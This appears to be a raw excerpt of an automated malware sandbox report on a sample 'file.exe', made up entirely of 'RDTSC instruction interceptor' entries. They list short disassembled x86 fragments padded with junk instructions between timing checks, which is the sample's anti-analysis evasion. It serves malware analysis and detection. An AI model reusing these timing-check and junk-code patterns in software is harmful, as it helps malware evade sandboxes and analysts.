                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA8B8 second address: 4DA8ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F25EC6CB8ECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F25EC6CB917h 0x00000013 jne 00007F25EC6CB8F7h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA8ED second address: 4DA8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DAA4F second address: 4DAA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F25EC6CB8E6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF6B4 second address: 4DF6D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F25ED41A9E6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF6D3 second address: 4DF6F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F25EC6CB8F4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF996 second address: 4DF99C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFAF7 second address: 4DFB27 instructions: 0x00000000 rdtsc 0x00000002 js 00007F25EC6CB8E6h 0x00000008 jg 00007F25EC6CB8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F25EC6CB8F1h 0x00000015 push ecx 0x00000016 jmp 00007F25EC6CB8ECh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFCC0 second address: 4DFCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F25ED41A9E6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jng 00007F25ED41A9E6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFE79 second address: 4DFE7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0BB second address: 49B188 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F25ED41A9F1h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F25ED41AA06h 0x00000012 pushad 0x00000013 jmp 00007F25ED41A9F8h 0x00000018 jp 00007F25ED41A9E6h 0x0000001e popad 0x0000001f nop 0x00000020 mov dword ptr [ebp+122D19B6h], edx 0x00000026 mov ebx, dword ptr [ebp+1248C071h] 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F25ED41A9E8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D307Ch], esi 0x0000004c add eax, ebx 0x0000004e je 00007F25ED41A9ECh 0x00000054 mov ecx, dword ptr [ebp+122D2965h] 0x0000005a nop 0x0000005b jp 00007F25ED41A9F7h 0x00000061 push eax 0x00000062 push eax 0x00000063 jmp 00007F25ED41A9F9h 0x00000068 pop eax 0x00000069 nop 0x0000006a mov edx, 0CADFB92h 0x0000006f push 00000004h 0x00000071 jp 00007F25ED41A9ECh 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jns 00007F25ED41A9E6h 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B188 second address: 49B18C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFFCE second address: 4DFFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F25ED41A9E6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0AE7 second address: 4E0AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0AED second address: 4E0B01 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F25ED41A9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F25ED41A9E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0B01 second address: 4E0B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0B05 second address: 4E0B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0B0F second address: 4E0B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F25EC6CB8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0B19 second address: 4E0B39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E463D second address: 4E4642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4642 second address: 4E465F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25ED41A9F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E465F second address: 4E4663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3F70 second address: 4E3F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3F7C second address: 4E3F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F25EC6CB8E6h 0x0000000c popad 0x0000000d pushad 0x0000000e jc 00007F25EC6CB8E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E40DC second address: 4E40E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5C3C second address: 4E5C44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8BB5 second address: 4E8BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8BB9 second address: 4E8C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F25EC6CB8F7h 0x0000000d pushad 0x0000000e jmp 00007F25EC6CB8F5h 0x00000013 push eax 0x00000014 pop eax 0x00000015 jnc 00007F25EC6CB8E6h 0x0000001b popad 0x0000001c popad 0x0000001d push edx 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pop edx 0x00000022 pushad 0x00000023 jmp 00007F25EC6CB8F3h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8C13 second address: 4E8C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8D7C second address: 4E8D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F25EC6CB8E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8FE7 second address: 4E8FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9EFh 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8FFB second address: 4E9005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F25EC6CB8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9005 second address: 4E9031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F25ED41A9F7h 0x00000011 pop ebx 0x00000012 jo 00007F25ED41A9F2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9031 second address: 4E9037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9308 second address: 4E9324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F25ED41A9F5h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE581 second address: 4EE5A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F25EC6CB8F7h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE5A2 second address: 4EE5A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE5A9 second address: 4EE5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8F8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE5CA second address: 4EE5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE722 second address: 4EE791 instructions: 0x00000000 rdtsc 0x00000002 js 00007F25EC6CB8E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F25EC6CB8F5h 0x00000011 pushad 0x00000012 jnp 00007F25EC6CB8E6h 0x00000018 jmp 00007F25EC6CB8EFh 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 popad 0x00000022 popad 0x00000023 push ecx 0x00000024 pushad 0x00000025 jmp 00007F25EC6CB8F9h 0x0000002a jmp 00007F25EC6CB8F5h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE791 second address: 4EE7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F25ED41A9EFh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EECEE second address: 4EECF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EEFC4 second address: 4EEFCE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F25ED41A9EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF520 second address: 4EF536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25EC6CB8F2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF536 second address: 4EF540 instructions: 0x00000000 rdtsc 0x00000002 js 00007F25ED41A9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF540 second address: 4EF549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF549 second address: 4EF553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EFAD2 second address: 4EFAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EFAD6 second address: 4EFADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8E46 second address: 4F8E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F25EC6CB8E6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8E59 second address: 4F8E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F876E second address: 4F8774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8774 second address: 4F8785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 jg 00007F25ED41A9ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447E48 second address: 447E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F25EC6CB8E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502331 second address: 502341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnp 00007F25ED41A9E6h 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502636 second address: 50267F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F25EC6CB8F5h 0x0000000d push esi 0x0000000e jmp 00007F25EC6CB8F3h 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F25EC6CB8F1h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50267F second address: 502683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5027E6 second address: 5027EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5027EA second address: 5027F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502A92 second address: 502A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502A9C second address: 502AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F25ED41A9ECh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503369 second address: 50336D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503A4D second address: 503A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503A51 second address: 503A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503A55 second address: 503A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jc 00007F25ED41A9E6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503A7D second address: 503A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503A89 second address: 503AAA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F25ED41A9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F25ED41A9F1h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E1D second address: 509E23 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E23 second address: 509E28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51168F second address: 511695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511695 second address: 5116B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F25ED41A9F4h 0x0000000d jc 00007F25ED41A9E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5116B7 second address: 5116C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8EEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5116C9 second address: 5116D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5116D3 second address: 5116DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F25EC6CB8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5116DD second address: 511718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F25ED41A9F8h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop esi 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511718 second address: 51171F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51171F second address: 511726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519261 second address: 519267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519267 second address: 51926B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51926B second address: 51926F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51CF50 second address: 51CF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F25ED41A9E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 451DF1 second address: 451DF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 451DF8 second address: 451E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C5B6 second address: 52C5C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25EC6CB8EAh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C5C6 second address: 52C5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537C59 second address: 537C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537C5D second address: 537C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9EFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537C72 second address: 537CC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F4h 0x00000007 jmp 00007F25EC6CB8F1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F25EC6CB8F7h 0x00000015 jmp 00007F25EC6CB8EDh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53666C second address: 536687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F25ED41A9E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53680C second address: 53681A instructions: 0x00000000 rdtsc 0x00000002 js 00007F25EC6CB8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53681A second address: 536824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536963 second address: 53697F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F25EC6CB8F5h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536EF8 second address: 536EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
